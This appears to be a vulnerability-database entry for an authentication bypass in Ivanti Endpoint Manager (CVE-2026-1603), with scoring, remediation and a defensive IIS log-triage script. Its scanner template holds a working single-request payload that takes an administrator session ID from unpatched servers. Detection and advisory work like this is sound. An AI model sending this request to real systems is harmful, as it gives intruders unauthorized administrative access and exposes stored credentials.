Ivanti Endpoint Manager - Authentication Bypass
CVE-2026-1603
Verified
Description
Ivanti Endpoint Manager < 2024 SU5 contains an authentication bypass caused by improper access control that lets remote unauthenticated attackers leak stored credential data. Exploitation requires no special privileges.
Severity
High
CVSS Score
8.6
Exploit Probability
59%
Affected Product
endpoint_manager
Published Date
February 13, 2026
Template Author
dhiyaneshdk, watchtowrlabs
CVE-2026-1603.yaml
id: CVE-2026-1603

info:
  name: Ivanti Endpoint Manager - Authentication Bypass
  author: DhiyaneshDk,watchtowrlabs
  severity: high
  description: |
    Ivanti Endpoint Manager < 2024 SU5 contains an authentication bypass caused by improper access control, letting remote unauthenticated attackers leak stored credential data, exploit requires no special privileges.
  impact: |
    Remote attackers can leak stored credential data, potentially compromising sensitive information.
  remediation: |
    Update to version 2024 SU5 or later.
  reference:
    - https://x.com/watchtowrcyber/status/2022305033086235108/photo/1
    - https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1603
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2026-1603
    cwe-id: CWE-288
    epss-score: 0.58921
    epss-percentile: 0.98244
    cpe: cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ivanti
    product: endpoint_manager
  tags: cve,cve2026,api,auth,ivanti,epmm,authbypass,vkev,kev

http:
  - raw:
      - |
        POST /RemoteControlAuth/api/Auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "logintype":"64",
          "username":"administrator"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"sessionid":'

      - type: word
        part: body
        words:
          - '"sessionid": null'
        negative: true

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body
        name: sessionid
        json:
          - '.sessionid'
# digest: 4a0a00473045022100e93693dcd091bfc6ad4ab70c30fc89f6fda1e7c69255cda6e8aab3cc9509f5c502205ee0e7587ec845612a76bf78d10f1ddcd4afa129cc8321db988418d083b4b32e:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
CVE ID:
CVE-2026-1603
CWE ID:
CWE-288
Remediation Steps
Update to version 2024 SU5 or later.
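Log triage for the endpoint the template requests, as an added example that is not part of the template or of Ivanti's advisory: it flags successful POSTs to /RemoteControlAuth/api/Auth from outside an allowlist. Assumptions: the core server's IIS logs are in W3C extended format with a #Fields directive, TRUSTED_NETS is a placeholder range, and the sample lines are constructed. IIS does not log request or response bodies, so a hit is a lead to investigate, not proof that a session ID was returned.

```python
import ipaddress

# Endpoint path from the template's raw request, lower-cased because IIS paths are case-insensitive.
AUTH_PATH = "/remotecontrolauth/api/auth"
# Assumption: networks from which remote-control logins are expected.
TRUSTED_NETS = [ipaddress.ip_network("10.20.0.0/16")]

# Constructed sample in IIS W3C extended format (not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status cs(User-Agent)
2026-02-14 09:12:01 10.20.4.17 POST /RemoteControlAuth/api/Auth 200 EPM-Console
2026-02-14 09:13:44 203.0.113.50 POST /RemoteControlAuth/api/Auth 200 python-requests/2.31
2026-02-14 09:13:45 203.0.113.50 POST /RemoteControlAuth/api/Auth 401 python-requests/2.31
2026-02-14 09:14:02 198.51.100.7 GET /RemoteControlAuth/api/Auth 405 curl/8.5.0
2026-02-14 09:15:30 198.51.100.7 POST /remotecontrolauth/API/auth 200 curl/8.5.0
"""

def parse_w3c(text):
    """Yield one dict per entry, taking column names from the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def is_trusted(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # unparseable client address is treated as untrusted
    return any(addr in net for net in TRUSTED_NETS)

def suspicious_auth_hits(text):
    """Return successful POSTs to the auth endpoint from untrusted sources."""
    hits = []
    for e in parse_w3c(text):
        if (e.get("cs-method") == "POST"
                and e.get("cs-uri-stem", "").lower().rstrip("/") == AUTH_PATH
                and e.get("sc-status") == "200"
                and not is_trusted(e.get("c-ip", ""))):
            hits.append((e["date"], e["time"], e["c-ip"], e["cs(User-Agent)"]))
    return hits

if __name__ == "__main__":
    for hit in suspicious_auth_hits(SAMPLE_LOG):
        print(*hit)
```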